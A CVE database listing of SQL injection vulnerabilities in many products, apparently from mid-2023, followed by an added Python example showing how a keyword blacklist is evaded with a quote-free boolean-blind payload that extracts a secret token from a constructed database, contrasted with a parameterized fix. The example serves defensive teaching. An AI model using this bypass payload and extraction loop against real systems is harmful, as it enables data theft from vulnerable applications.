Total: 8599 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2023-33666 | 1 Ai-dev | 1 Aioptimizedcombinations | 2023-08-08 | N/A | 9.8 CRITICAL |
| ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php. | |||||
| CVE-2023-33665 | 1 Ai-dev | 1 Ai-table | 2023-08-08 | N/A | 9.8 CRITICAL |
| ai-dev aitable before v0.2.2 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php. | |||||
| CVE-2023-39121 | 1 Emlog | 1 Emlog | 2023-08-08 | N/A | 7.2 HIGH |
| emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php. | |||||
| CVE-2022-0366 | 1 Capsule8 | 1 Capsule8 | 2023-08-08 | 6.5 MEDIUM | 8.8 HIGH |
| An authenticated and authorized agent user could potentially gain administrative access via an SQLi vulnerability to Capsule8 Console between versions 4.6.0 and 4.9.1. | |||||
| CVE-2022-39072 | 1 Zte | 4 Mf286r, Mf286r Firmware, Mf289d and 1 more | 2023-08-08 | N/A | 5.4 MEDIUM |
| There is a SQL injection vulnerability in some ZTE Mobile Internet products. Due to insufficient validation of the input parameters of the SNTP interface, an authenticated attacker could use the vulnerability to execute stored XSS attacks. | |||||
| CVE-2022-29652 | 1 Online Sports Complex Booking System Project | 1 Online Sports Complex Booking System | 2023-08-08 | 4.3 MEDIUM | 6.1 MEDIUM |
| Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client. | |||||
| CVE-2023-1207 | 1 Riverside | 1 Http Headers | 2023-08-08 | N/A | 7.2 HIGH |
| This HTTP Headers WordPress plugin before 1.18.8 has an import functionality which executes arbitrary SQL on the server, leading to an SQL Injection vulnerability. | |||||
| CVE-2023-38954 | 1 Zkteco | 1 Bioaccess Ivs | 2023-08-07 | N/A | 9.8 CRITICAL |
| ZKTeco BioAccess IVS v3.3.1 was discovered to contain a SQL injection vulnerability. | |||||
| CVE-2023-21412 | 1 Axis | 1 License Plate Verifier | 2023-08-07 | N/A | 8.8 HIGH |
| User provided input is not sanitized on the AXIS License Plate Verifier specific “search.cgi” allowing for SQL injections. | |||||
| CVE-2022-4557 | 1 Gruparge | 1 Smartpower | 2023-08-05 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection. This issue affects Smartpower Web: before 23.01.01. | |||||
| CVE-2023-34635 | 1 Wifi-soft | 1 Unibox Administration | 2023-08-04 | N/A | 9.8 CRITICAL |
| Wifi Soft Unibox Administration 3.0 and 3.1 are vulnerable to SQL Injection. The vulnerability occurs because of not validating or sanitizing the user input in the username field of the login page. | |||||
| CVE-2023-37771 | 1 Phpgurukul | 1 Art Gallery Management System | 2023-08-04 | N/A | 9.8 CRITICAL |
| Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php. | |||||
| CVE-2023-3983 | 1 Advantech | 1 Iview | 2023-08-04 | N/A | 8.8 HIGH |
| An authenticated SQL injection vulnerability exists in Advantech iView versions prior to v5.7.4 build 6752. An authenticated remote attacker can bypass checks in com.imc.iview.utils.CUtils.checkSQLInjection() to perform blind SQL injection. | |||||
| CVE-2023-39122 | 1 Bmc | 1 Control-m | 2023-08-04 | N/A | 9.8 CRITICAL |
| BMC Control-M through 9.0.20.200 allows SQL injection via the /RF-Server/report/deleteReport report-id parameter. This is fixed in 9.0.21 (and is also fixed by a patch for 9.0.20.200). | |||||
| CVE-2023-37647 | 1 Sem-cms | 1 Semcms | 2023-08-04 | N/A | 9.8 CRITICAL |
| SEMCMS v1.5 was discovered to contain a SQL injection vulnerability via the id parameter at /Ant_Suxin.php. | |||||
| CVE-2020-21662 | 1 Yunyecms | 1 Yunyecms | 2023-08-03 | N/A | 9.8 CRITICAL |
| SQL injection vulnerability in yunyecms 2.0.2 allows remote attackers to run arbitrary SQL commands via the XFF (X-Forwarded-For) header. | |||||
| CVE-2023-38992 | 1 Jeecg | 1 Jeecg Boot | 2023-08-03 | N/A | 9.8 CRITICAL |
| jeecg-boot v3.5.1 was discovered to contain a SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData. | |||||
| CVE-2023-3987 | 1 Simple Online Mens Salon Management System Project | 1 Simple Online Mens Salon Management System | 2023-08-03 | N/A | N/A |
| A vulnerability was found in SourceCodester Simple Online Mens Salon Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=user/manage_user&id=3. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235608. | |||||
| CVE-2023-3988 | 1 Cafe Billing System Project | 1 Cafe Billing System | 2023-08-03 | N/A | 9.8 CRITICAL |
| A vulnerability was found in Cafe Billing System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Order Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235609 was assigned to this vulnerability. | |||||
| CVE-2023-26859 | 1 Brevo | 1 Brevo | 2023-08-02 | N/A | 9.8 CRITICAL |
| SQL injection vulnerability found in PrestaShop sendinblue v.4.0.15 and before allows a remote attacker to gain privileges via the ajaxOrderTracking.php component. | |||||
| CVE-2023-1522 | 1 Genetec | 1 Security Center | 2023-08-02 | N/A | 8.8 HIGH |
| SQL Injection in the Hardware Inventory report of Security Center 5.11.2. | |||||
| CVE-2008-0491 | 1 Fgallery Project | 1 Fgallery | 2023-08-02 | 7.5 HIGH | N/A |
| SQL injection vulnerability in fim_rss.php in the fGallery 2.4.1 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the album parameter. | |||||
| CVE-2008-0616 | 1 Dmsguestbook Project | 1 Dmsguestbook | 2023-08-02 | 6.5 MEDIUM | N/A |
| SQL injection vulnerability in the administration panel in the DMSGuestbook 1.7.0 plugin for WordPress allows remote authenticated administrators to execute arbitrary SQL commands via unspecified vectors. NOTE: it is not clear whether this issue crosses privilege boundaries. | |||||
| CVE-2014-4873 | 1 Bmc | 1 Track-It! | 2023-08-02 | 6.5 MEDIUM | N/A |
| SQL injection vulnerability in TrackItWeb/Grid/GetData in BMC Track-It! 11.3.0.355 allows remote authenticated users to execute arbitrary SQL commands via crafted POST data. | |||||
| CVE-2023-2601 | 1 Wp Brutal Ai Project | 1 Wp Brutal Ai | 2023-08-02 | N/A | 9.8 CRITICAL |
| The wpbrutalai WordPress plugin before 2.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF. | |||||
| CVE-2023-35088 | 1 Apache | 1 Inlong | 2023-08-02 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.7.0. In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks. Users are advised to upgrade to Apache InLong 1.8.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8198 | |||||
| CVE-2023-37258 | 1 Dataease | 1 Dataease | 2023-08-01 | N/A | 9.8 CRITICAL |
| DataEase is an open source data visualization analysis tool. Prior to version 1.18.9, DataEase has a SQL injection vulnerability that can bypass blacklists. The vulnerability has been fixed in v1.18.9. There are no known workarounds. | |||||
| CVE-2023-30151 | 1 Prestashop | 1 Prestashop | 2023-08-01 | N/A | 9.8 CRITICAL |
| A SQL injection vulnerability in the Boxtal (envoimoinscher) module for PrestaShop, after version 3.1.10, allows remote attackers to execute arbitrary SQL commands via the `key` GET parameter. | |||||
| CVE-2023-2636 | 1 An Gradebook Project | 1 An Gradebook | 2023-07-31 | N/A | 8.8 HIGH |
| The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. | |||||
| CVE-2023-30625 | 1 Rudderstack | 1 Rudder-server | 2023-07-31 | N/A | 8.8 HIGH |
| rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgreSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue. | |||||
| CVE-2023-37361 | 1 Vanderbilt | 1 Redcap | 2023-07-31 | N/A | 2.7 LOW |
| REDCap 12.0.26 LTS and 12.3.2 Standard allows SQL Injection via scheduling, repeatforms, purpose, app_title, or randomization. | |||||
| CVE-2023-37165 | 1 Millhouse-project Project | 1 Millhouse-project | 2023-07-31 | N/A | 9.8 CRITICAL |
| Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php. | |||||
| CVE-2023-3854 | 1 Phpscriptpoint | 1 Bloodbank | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability classified as critical has been found in phpscriptpoint BloodBank 1.1. Affected is an unknown function of the file /search of the component POST Parameter Handler. The manipulation of the argument country/city/blood_group_id leads to sql injection. It is possible to launch the attack remotely. VDB-235206 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-35066 | 1 Infodrom | 1 E-invoice Approval System | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infodrom Software E-Invoice Approval System allows SQL Injection. This issue affects E-Invoice Approval System: before v.20230701. | |||||
| CVE-2023-3046 | 1 Biltay | 1 Scienta | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Biltay Technology Scienta allows SQL Injection. This issue affects Scienta: before 20230630.1953. | |||||
| CVE-2023-3859 | 1 Phpscriptpoint | 1 Car Listing | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability was found in phpscriptpoint Car Listing 1.6 and classified as critical. This issue affects some unknown processing of the file /search.php of the component GET Parameter Handler. The manipulation of the argument brand_id/model_id/car_condition/car_category_id/body_type_id/fuel_type_id/transmission_type_id/year/mileage_start/mileage_end/country/state/city leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235211. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-1547 | 1 Elra | 1 Parkmatik | 2023-07-31 | N/A | 9.8 CRITICAL |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Elra Parkmatik allows SQL Injection through SOAP Parameter Tampering, Command Line Execution through SQL Injection. This issue affects Parkmatik: before 02.01-a51. | |||||
| CVE-2023-2761 | 1 Solwininfotech | 1 User Activity Log | 2023-07-31 | N/A | 7.2 HIGH |
| The User Activity Log WordPress plugin before 1.6.3 does not properly sanitise and escape the `txtsearch` parameter before using it in a SQL statement in some admin pages, leading to a SQL injection exploitable by high privilege users such as admin. | |||||
| CVE-2023-3850 | 1 Lost And Found Information System Project | 1 Lost And Found Information System | 2023-07-31 | N/A | 9.8 CRITICAL |
| A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_category of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-235201 was assigned to this vulnerability. | |||||
| CVE-2023-3791 | 1 Ibos | 1 Ibos | 2023-07-28 | N/A | 9.8 CRITICAL |
| A vulnerability was found in IBOS OA 4.5.5 and classified as critical. Affected by this issue is the function actionExport of the file ?r=contact/default/export of the component Personal Office Address Book. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-3877 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/add-services.php. The manipulation of the argument cost leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235239. | |||||
| CVE-2023-3879 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/del_category.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235241 was assigned to this vulnerability. | |||||
| CVE-2023-3878 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/about-us.php. The manipulation of the argument pagedes leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235240. | |||||
| CVE-2023-3882 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability, which was classified as critical, has been found in Campcodes Beauty Salon Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-accepted-appointment.php. The manipulation of the argument contactno leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235244. | |||||
| CVE-2023-3839 | 1 Dedebiz | 1 Dedebiz | 2023-07-28 | N/A | 7.2 HIGH |
| A vulnerability, which was classified as problematic, has been found in DedeBIZ 6.2.10. Affected by this issue is some unknown functionality of the file /admin/sys_sql_query.php. The manipulation of the argument sqlquery leads to sql injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-235190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2023-3880 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/del_service.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235242 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-3881 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php. The manipulation of the argument contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235243. | |||||
| CVE-2023-3872 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability classified as critical was found in Campcodes Beauty Salon Management System 1.0. This vulnerability affects unknown code of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235234 is the identifier assigned to this vulnerability. | |||||
| CVE-2023-3875 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability has been found in Campcodes Beauty Salon Management System 0.1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/del_feedback.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235237 was assigned to this vulnerability. | |||||
| CVE-2023-3874 | 1 Campcodes | 1 Beauty Salon Management System | 2023-07-28 | N/A | 7.5 HIGH |
| A vulnerability, which was classified as critical, was found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235236. | |||||

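CVE-2023-3983 (Advantech iView) and CVE-2023-37258 (DataEase) both describe an injection filter that a crafted value walks past. The Python example below is added here and is not either vendor's code. It puts a hypothetical keyword-and-quote blacklist (`naive_blacklist_check`, an assumption in the style such filters take, not the real `checkSQLInjection()`) in front of a string-built lookup, shows a boolean-blind payload built only from CASE, substr() and unicode() that contains no blacklisted token and no quote, recovers a secret column one character at a time through the row-present/row-absent oracle, and contrasts the parameterized lookup that rejects the same value. The schema, rows and function names are constructed for the example.

```python
import re
import sqlite3
import string

# Hypothetical blacklist (assumption for this example): common SQL keywords, comment
# markers, statement separators and both quote characters.
BLACKLIST = re.compile(
    r"(?i)\b(or|and|union|select|insert|update|delete|drop|sleep|benchmark)\b|--|;|/\*|'|\""
)


def naive_blacklist_check(value: str) -> bool:
    """True when the value contains none of the blacklisted tokens (the filter passes it)."""
    return BLACKLIST.search(value) is None


def make_db() -> sqlite3.Connection:
    # Constructed schema and rows; api_token is what the attacker is after.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_token TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "tok-a1"), (2, "bob", "tok-b2"), (3, "carol", "s3cr3t")],
    )
    return conn


def lookup_name_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """Blacklist in front of a string-built query: the shape of a filtered endpoint."""
    if not naive_blacklist_check(raw_id):
        raise ValueError("rejected by blacklist")
    row = conn.execute(f"SELECT name FROM users WHERE id = {raw_id}").fetchone()
    return row[0] if row else None


def lookup_name_hardened(conn: sqlite3.Connection, raw_id: str):
    """Type the input and bind it; a non-integer value never reaches the SQL text."""
    user_id = int(raw_id)  # ValueError for anything but an integer literal
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def blind_extract_token(conn: sqlite3.Connection, target_id: int, max_len: int = 32) -> str:
    """Recover users.api_token for target_id through a boolean-blind oracle.

    Each probe turns the WHERE clause into
        id = CASE WHEN unicode(substr(api_token,<pos>,1))=<code> THEN <target_id> ELSE -1 END
    so the row comes back only when the guessed character is right. CASE/WHEN/THEN/ELSE/END,
    substr and unicode are not on the blacklist, and comparing code points avoids quotes.
    """
    alphabet = string.ascii_letters + string.digits + "-_"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = (
                f"CASE WHEN unicode(substr(api_token,{pos},1))={ord(ch)} "
                f"THEN {target_id} ELSE -1 END"
            )
            if not naive_blacklist_check(payload):
                raise RuntimeError("probe unexpectedly blocked")  # does not occur with this filter
            if lookup_name_vulnerable(conn, payload) is not None:
                hit = ch
                break
        if hit is None:
            break  # substr() past the end yields '' and matches no candidate: end of token
        recovered += hit
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("filter blocks the textbook payload:", not naive_blacklist_check("3 OR 1=1"))
    print("recovered api_token for id 3:", blind_extract_token(conn, 3))
    try:
        lookup_name_hardened(conn, "CASE WHEN 1=1 THEN 3 ELSE -1 END")
    except ValueError as exc:
        print("hardened lookup rejected the payload:", exc)
```

The point is not the particular tokens this blacklist misses: any filter that tries to enumerate bad substrings is working against the full SQL expression grammar, which is far larger than its list. Typing the value (here `int()`) and binding it as a parameter removes the problem instead of racing it, and is the check a code review should look for in place of a `checkSQLInjection`-style gate.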